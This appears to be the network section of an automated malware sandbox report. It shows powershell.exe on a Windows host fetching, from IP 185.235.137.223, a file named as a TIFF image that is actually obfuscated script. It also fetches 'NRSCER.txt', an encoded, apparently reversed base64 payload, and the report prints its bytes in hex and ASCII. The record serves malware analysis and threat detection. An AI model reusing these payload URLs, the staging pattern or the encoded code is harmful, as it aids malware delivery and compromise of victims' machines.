                                              Data Raw: 32 35 32 35 32 35 32 30 77 53 72 61 75 61 61 58 59 72 67 44 75 79 53 6c 6a 65 6d 44 57 50 43 46 69 6d 53 57 48 44 53 71 4c 5a 56 73 65 4c 41 44 4d 65 48 49 6a 58 51 61 50 73 62 77 4b 73 65 6c 44 6d 70 76 55 52 67 6f 75 6c 78 66 51 45 4e 6b 4e 74 4f 69 59 4a 72 76 4e 54 72 58 4c 7a 6b 74 49 76 76 65 52 6c 6f 56 73 52 65 50 59 76 76 53 55 41 4a 46 69 77 62 41 58 56 72 4b 74 58 44 64 72 64 74 78 55 42 57 6c 42 66 59 59 59 59 67 45 66 4d 41 42 6a 59 45 70 70 4d 69 69 64 43 50 72 42 79 73 64 79 41 4f 6d 4f 72 6f 67 6b 62 43 77 6d 74 76 79 77 66 47 50 4b 49 5a 56 6b 62 45 6d 67 55 79 78 59 59 79 61 64 4f 69 52 66 75 73 75 6e 49 43 58 70 46 53 65 64 58 58 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 [TRUNCATED]
                                              Data Ascii: 25252520wSrauaaXYrgDuySljemDWPCFimSWHDSqLZVseLADMeHIjXQaPsbwKselDmpvURgoulxfQENkNtOiYJrvNTrXLzktIvveRloVsRePYvvSUAJFiwbAXVrKtXDdrdtxUBWlBfYYYYgEfMABjYEppMiidCPrBysdyAOmOrogkbCwmtvywfGPKIZVkbEmgUyxYYyadOiRfusunICXpFSedXX%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:59.517716885 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                              Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:59.517729044 CEST1236INData Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                              Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                              Sep 9, 2024 17:48:59.517841101 CEST672INData Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32
                                              Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
                                              Sep 9, 2024 17:48:59.517851114 CEST1236INData Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                              Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                              Sep 9, 2024 17:48:59.517862082 CEST1236INData Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32
                                              Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
                                              Sep 9, 2024 17:48:59.518002987 CEST1236INData Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32
                                              Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
                                              Sep 9, 2024 17:48:59.518014908 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                              Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:59.518028021 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                              Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                              Sep 9, 2024 17:48:59.518039942 CEST1236INData Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                              Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                              Sep 9, 2024 17:48:59.522772074 CEST1236INData Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                              Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249167185.235.137.223803612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 9, 2024 17:49:03.721335888 CEST358OUTGET /200/pictureupdatedwithnewquality.tIF HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 185.235.137.223
                                              Connection: Keep-Alive
                                              Sep 9, 2024 17:49:04.335088015 CEST1236INHTTP/1.1 200 OK
                                              Date: Mon, 09 Sep 2024 15:49:04 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                              Last-Modified: Mon, 09 Sep 2024 07:12:50 GMT
                                              ETag: "2f69e-621aa7c1ac6e2"
                                              Accept-Ranges: bytes
                                              Content-Length: 194206
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: image/tiff
                                              Data Raw: ff fe 75 00 57 00 62 00 47 00 67 00 57 00 6c 00 6d 00 47 00 4c 00 69 00 66 00 20 00 3d 00 20 00 22 00 50 00 57 00 7a 00 66 00 57 00 50 00 70 00 55 00 7a 00 69 00 4e 00 71 00 22 00 0d 00 0a 00 75 00 70 00 4c 00 4f 00 63 00 7a 00 5a 00 57 00 70 00 4c 00 57 00 64 00 20 00 3d 00 20 00 22 00 4c 00 57 00 57 00 4f 00 57 00 57 00 57 00 6b 00 61 00 47 00 76 00 6e 00 22 00 0d 00 0a 00 57 00 4c 00 6a 00 69 00 41 00 48 00 78 00 55 00 70 00 6d 00 4b 00 55 00 20 00 3d 00 20 00 22 00 4c 00 6f 00 5a 00 55 00 68 00 69 00 65 00 65 00 41 00 47 00 75 00 4b 00 22 00 0d 00 0a 00 62 00 6d 00 71 00 63 00 57 00 62 00 48 00 4b 00 62 00 6b 00 69 00 42 00 20 00 3d 00 20 00 22 00 74 00 4c 00 7a 00 6e 00 6a 00 6d 00 4e 00 47 00 65 00 41 00 41 00 69 00 22 00 0d 00 0a 00 41 00 41 00 6f 00 4c 00 61 00 5a 00 4e 00 57 00 4e 00 65 00 4c 00 68 00 20 00 3d 00 20 00 22 00 64 00 47 00 61 00 41 00 4e 00 65 00 47 00 71 00 6d 00 6c 00 4a 00 62 00 22 00 0d 00 0a 00 50 00 55 00 6b 00 72 00 52 00 4b 00 55 00 62 00 78 00 4e 00 6f 00 6d 00 20 00 [TRUNCATED]
                                              Data Ascii: uWbGgWlmGLif = "PWzfWPpUziNq"upLOczZWpLWd = "LWWOWWWkaGvn"WLjiAHxUpmKU = "LoZUhieeAGuK"bmqcWbHKbkiB = "tLznjmNGeAAi"AAoLaZNWNeLh = "dGaANeGqmlJb"PUkrRKUbxNom = "eohGcelchHoI"KWNIPuLLZupC = "LihfgmqziLLL"TvPnzkABapxP = "PWCxUQKGifaO"UcLtcmLNpmvW = "zWLPSLLassLL"cxRxKtaUOzoW = "GqCzGcbLNTZk"ULACxGWWcGmZ = "ZguCiKLWeoKp"WKhJWKkqQRux = "xkLWCUcNbfbd"xLPOhduLUbog = "LKZpmPWKLLLc"PmgLOuWhRlLO = "ZoAnkxbetGWe"TRApioGknckc = "kLiLidRS
                                              Sep 9, 2024 17:49:04.335128069 CEST1236INData Raw: 00 6e 00 4a 00 68 00 50 00 22 00 0d 00 0a 00 62 00 71 00 62 00 62 00 55 00 5a 00 75 00 42 00 6b 00 6f 00 48 00 6f 00 20 00 3d 00 20 00 22 00 7a 00 57 00 6b 00 5a 00 57 00 57 00 57 00 4c 00 65 00 6f 00 57 00 65 00 22 00 0d 00 0a 00 69 00 43 00 57
                                              Data Ascii: nJhP"bqbbUZuBkoHo = "zWkZWWWLeoWe"iCWKpaKPnWia = "LzUBNZbGPjTG"UWWKphdccNeO = "LkdcCBzulTou"NCAoHvOWmnKZ = "keKtL
                                              Sep 9, 2024 17:49:04.335138083 CEST1236INData Raw: 00 3d 00 20 00 22 00 53 00 49 00 69 00 6c 00 50 00 69 00 5a 00 4b 00 4f 00 6b 00 4c 00 70 00 22 00 0d 00 0a 00 61 00 74 00 70 00 75 00 54 00 55 00 4c 00 50 00 4c 00 43 00 65 00 41 00 20 00 3d 00 20 00 22 00 52 00 6d 00 62 00 4b 00 6f 00 6b 00 61
                                              Data Ascii: = "SIilPiZKOkLp"atpuTULPLCeA = "RmbKokaicPGi"eWWLuLzaLdPi = "LRCWUoiJfttf"uUTLKffoooalamutu = "LlWlAhsLoKalamutu"
                                              Sep 9, 2024 17:49:04.335232973 CEST1236INData Raw: 00 48 00 50 00 4c 00 65 00 6e 00 22 00 0d 00 0a 00 62 00 6d 00 4c 00 50 00 4c 00 4b 00 53 00 69 00 74 00 62 00 65 00 47 00 20 00 3d 00 20 00 22 00 4c 00 62 00 71 00 4c 00 6d 00 4e 00 69 00 6d 00 42 00 69 00 64 00 65 00 22 00 0d 00 0a 00 4c 00 47
                                              Data Ascii: HPLen"bmLPLKSitbeG = "LbqLmNimBide"LGKnhoLkxkZc = "UWuWAWUQRgbN"GWGGWsehipGh = "eOepKJUonUHi"iGUbWxWKtmNO = "CzcU
                                              Sep 9, 2024 17:49:04.335277081 CEST1236INData Raw: 00 5a 00 57 00 76 00 48 00 75 00 20 00 3d 00 20 00 22 00 63 00 74 00 6c 00 4b 00 57 00 4e 00 55 00 7a 00 4b 00 47 00 4e 00 4b 00 22 00 0d 00 0a 00 6b 00 69 00 55 00 48 00 4b 00 42 00 75 00 63 00 4c 00 50 00 6e 00 57 00 20 00 3d 00 20 00 22 00 73
                                              Data Ascii: ZWvHu = "ctlKWNUzKGNK"kiUHKBucLPnW = "sjLpZWWKKLvW"ghWpZUzLdIUz = "RtzizkiGuZKP"UcKfUCmhKGLP = "NKkApWNvLLkO"tzcG
                                              Sep 9, 2024 17:49:04.335288048 CEST1236INData Raw: 00 6b 00 22 00 0d 00 0a 00 47 00 63 00 57 00 47 00 6c 00 7a 00 4e 00 68 00 5a 00 6c 00 4c 00 43 00 20 00 3d 00 20 00 22 00 41 00 4f 00 4c 00 6d 00 4c 00 69 00 4e 00 75 00 63 00 63 00 4c 00 4c 00 22 00 0d 00 0a 00 42 00 47 00 65 00 70 00 4c 00 57
                                              Data Ascii: k"GcWGlzNhZlLC = "AOLmLiNuccLL"BGepLWcUGgfl = "gkLksfvGLsWL"uHZqtORWhZRN = "ZfkLfbLoWGeH"SWWLpcLLzOpq = "WQKCKziK
                                              Sep 9, 2024 17:49:04.335297108 CEST1236INData Raw: 00 53 00 75 00 4c 00 57 00 6a 00 22 00 0d 00 0a 00 57 00 4c 00 6d 00 68 00 5a 00 6a 00 69 00 55 00 4e 00 55 00 74 00 47 00 20 00 3d 00 20 00 22 00 4b 00 57 00 43 00 4b 00 63 00 62 00 4f 00 57 00 47 00 4f 00 76 00 57 00 22 00 0d 00 0a 00 6c 00 57
                                              Data Ascii: SuLWj"WLmhZjiUNUtG = "KWCKcbOWGOvW"lWOtGmmLUilP = "mkaWhKZkLpalamutu"BlfiKWacLzeW = "UUKWJAGWZKep"aGfLBixjPGum =
                                              Sep 9, 2024 17:49:04.335485935 CEST1000INData Raw: 00 20 00 3d 00 20 00 22 00 42 00 68 00 6b 00 4b 00 74 00 41 00 76 00 69 00 5a 00 57 00 47 00 43 00 22 00 0d 00 0a 00 57 00 41 00 70 00 41 00 6b 00 69 00 47 00 4c 00 49 00 4e 00 5a 00 57 00 20 00 3d 00 20 00 22 00 4c 00 51 00 47 00 61 00 4a 00 6f
                                              Data Ascii: = "BhkKtAviZWGC"WApAkiGLINZW = "LQGaJoLdcjOk"LPaPWKvCRCbi = "qAfqqLOobcSi"kQWkakLgQKuq = "ohPkZxKzJhLW"xkoIUIGTA
                                              Sep 9, 2024 17:49:04.335506916 CEST1236INData Raw: 00 20 00 22 00 4b 00 57 00 78 00 73 00 78 00 57 00 7a 00 4f 00 61 00 6c 00 61 00 6d 00 75 00 74 00 75 00 41 00 4c 00 22 00 0d 00 0a 00 63 00 75 00 65 00 65 00 50 00 41 00 69 00 4c 00 4c 00 4c 00 50 00 6b 00 20 00 3d 00 20 00 22 00 75 00 78 00 7a
                                              Data Ascii: "KWxsxWzOalamutuAL"cueePAiLLLPk = "uxzkGmfAPNnL"csBcGdKRWGpk = "iLookQLLsQcP"fKdUgJgiLpKK = "LoeiiIJcLxoW"WiCi
                                              Sep 9, 2024 17:49:04.335592985 CEST1236INData Raw: 00 0d 00 0a 00 5a 00 42 00 57 00 78 00 4c 00 53 00 71 00 6d 00 72 00 63 00 6b 00 47 00 20 00 3d 00 20 00 22 00 6b 00 57 00 76 00 5a 00 57 00 62 00 61 00 57 00 6d 00 74 00 62 00 4b 00 22 00 0d 00 0a 00 75 00 68 00 57 00 4f 00 41 00 4e 00 41 00 69
                                              Data Ascii: ZBWxLSqmrckG = "kWvZWbaWmtbK"uhWOANAiWzLp = "iBqioiojizLK"xnNKALGkWbNG = "nGxfkbfbkPKk"GitJUicAAhiS = "WAfzRLdU
                                              Sep 9, 2024 17:49:04.340112925 CEST1236INData Raw: 00 66 00 6b 00 64 00 48 00 4f 00 61 00 4b 00 73 00 66 00 4b 00 22 00 0d 00 0a 00 4c 00 50 00 68 00 66 00 66 00 71 00 4c 00 51 00 70 00 4b 00 4a 00 61 00 20 00 3d 00 20 00 22 00 66 00 4b 00 57 00 55 00 52 00 68 00 6a 00 54 00 47 00 4b 00 55 00 6f
                                              Data Ascii: fkdHOaKsfK"LPhffqLQpKJa = "fKWURhjTGKUo"kLLgKLiNAKxU = "zoCAWmclJdCN"hLTKKkCUpWko = "uGUltLckpmxG"LLKizKACGzWf


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.2249169185.235.137.223803940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 9, 2024 17:49:12.774596930 CEST79OUTGET /200/NRSCER.txt HTTP/1.1
                                              Host: 185.235.137.223
                                              Connection: Keep-Alive
                                              Sep 9, 2024 17:49:13.417831898 CEST1236INHTTP/1.1 200 OK
                                              Date: Mon, 09 Sep 2024 15:49:13 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                              Last-Modified: Sun, 08 Sep 2024 23:50:30 GMT
                                              ETag: "a1000-621a44e37f5ce"
                                              Accept-Ranges: bytes
                                              Content-Length: 659456
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/plain
                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                              Sep 9, 2024 17:49:13.417851925 CEST224INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1
                                              Sep 9, 2024 17:49:13.417900085 CEST1236INData Raw: 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77 41
                                              Data Ascii: AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZN
                                              Sep 9, 2024 17:49:13.417957067 CEST224INData Raw: 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44
                                              Data Ascii: nDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNk
                                              Sep 9, 2024 17:49:13.418266058 CEST1236INData Raw: 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 32 77 73 4e 45 62 44 76 32 51 72 4e 73 61 44 70 32 77 70 4e 55 61 44 6a 32 51 6f 4e 38 5a 44 64 32 77 6d 4e 6b 5a 44 58 32 51 6c 4e 4d 5a 44 52 32 77 6a 4e 30 59 44
                                              Data Ascii: cDH3QxNMcDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8ZDd2wmNkZDX2QlNMZDR2wjN0YDL2QiNcYDF2wgNEUD/1QfNsXD51wdNUXDz1QcN8WDt1waNkWDn1QZNMWDh1wXN0VDb1QWNEQD/0QPNsTD50wNNUTDz0QMN8SDt0wKNkSDn0QJNMSDh0wHN0RDb0QGNcRDV0wENERDP0QDNsQDJzg0M8MDMzQyMYMDD
                                              Sep 9, 2024 17:49:13.418289900 CEST1236INData Raw: 67 62 4e 77 57 44 71 31 41 61 4e 59 57 44 6b 31 67 59 4e 41 57 44 65 31 41 58 4e 6f 56 44 59 31 67 56 4e 51 56 44 53 31 41 55 4e 34 55 44 4d 31 67 53 4e 67 55 44 47 31 41 52 4e 49 55 44 41 30 67 50 4e 77 54 44 36 30 41 4f 4e 59 54 44 30 30 67 4d
                                              Data Ascii: gbNwWDq1AaNYWDk1gYNAWDe1AXNoVDY1gVNQVDS1AUN4UDM1gSNgUDG1ARNIUDA0gPNwTD60AONYTD00gMNATDu0ALNoSDo0gJNQSDi0AIN4RDc0gGNgRDW0AFNIRDQ0gDNwQDK0ACNYQDE0gANAMD+zA/MoPD4zg9MQPDyzA8M4ODszg6MgODmzA5MIODgzg3MwNDazA2MYNDUzg0MANDOzAzMoMDIzgxMQMDCzAgM4LD8yguM
                                              Sep 9, 2024 17:49:13.418303013 CEST1236INData Raw: 4f 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 64 7a 41 33 4d 73 4e 44 61 7a 51 32 4d 67 4e 44 58 7a 67 31 4d 55 4e 44 55 7a 77 30 4d 49 4e 44 52 7a 41 30 4d 38 4d 44 4f 7a 51 7a 4d 77 41 44
                                              Data Ascii: ODpzA6McODmzQ5MQODjzg4MEODgzw3M4NDdzA3MsNDazQ2MgNDXzg1MUNDUzw0MINDRzA0M8MDOzQzMwADzwQMM8CDtwwKMkCDnwQJMMCDhwwHM0BDbwQGMcBDVwwEMEBDPwQDMsADJwwBMUADDwQAAAIAoAUAoA8D//Q/Ps/D5/w9PU/Dz/Q8P8+Dt/w6Pk+Dn/Q5PM+Dh/w3P09Db/Q2Pc9DV/w0PE9DP/QzPs8DJ/wxPU8DD
                                              Sep 9, 2024 17:49:13.418428898 CEST1236INData Raw: 77 61 50 4f 32 44 68 39 45 58 50 6d 74 44 56 36 55 63 4f 49 5a 54 2f 32 6f 73 4e 54 59 44 41 31 45 65 4e 53 58 54 71 31 55 5a 4e 74 55 6a 4a 31 38 52 4e 59 45 44 31 41 41 41 41 55 42 51 42 51 42 67 50 50 37 44 79 2b 45 70 50 4a 32 44 6c 36 6f 6d
                                              Data Ascii: waPO2Dh9EXPmtDV6UcOIZT/2osNTYDA1EeNSXTq1UZNtUjJ18RNYED1AAAAUBQBQBgPP7Dy+EpPJ2Dl6omOjpDL6QiMRFT5woFAAAAIAUAQAAAA/49PH/DN+ErPM0Tk90SPNwju8sjOamTu5caOVmjH4wOOcjT024uNdXj2yEoM5JzYy0kMyAD+AAAAABQBwAAAA8Dn/AgPB7jA7UYORhzb4AFOIcT+345NKdDQ2YvNubTm1EfN
                                              Sep 9, 2024 17:49:13.418442011 CEST1236INData Raw: 75 6a 56 36 45 76 4f 58 71 44 6a 36 38 6e 4f 63 70 6a 50 35 45 59 4f 34 67 7a 35 34 6f 4d 4f 32 69 54 4a 32 45 74 4e 43 5a 7a 49 32 51 51 4e 5a 54 7a 62 7a 49 30 4d 59 4d 6a 44 79 34 6b 4d 6b 49 44 42 78 45 64 4d 34 42 44 37 77 51 4f 41 41 41 41
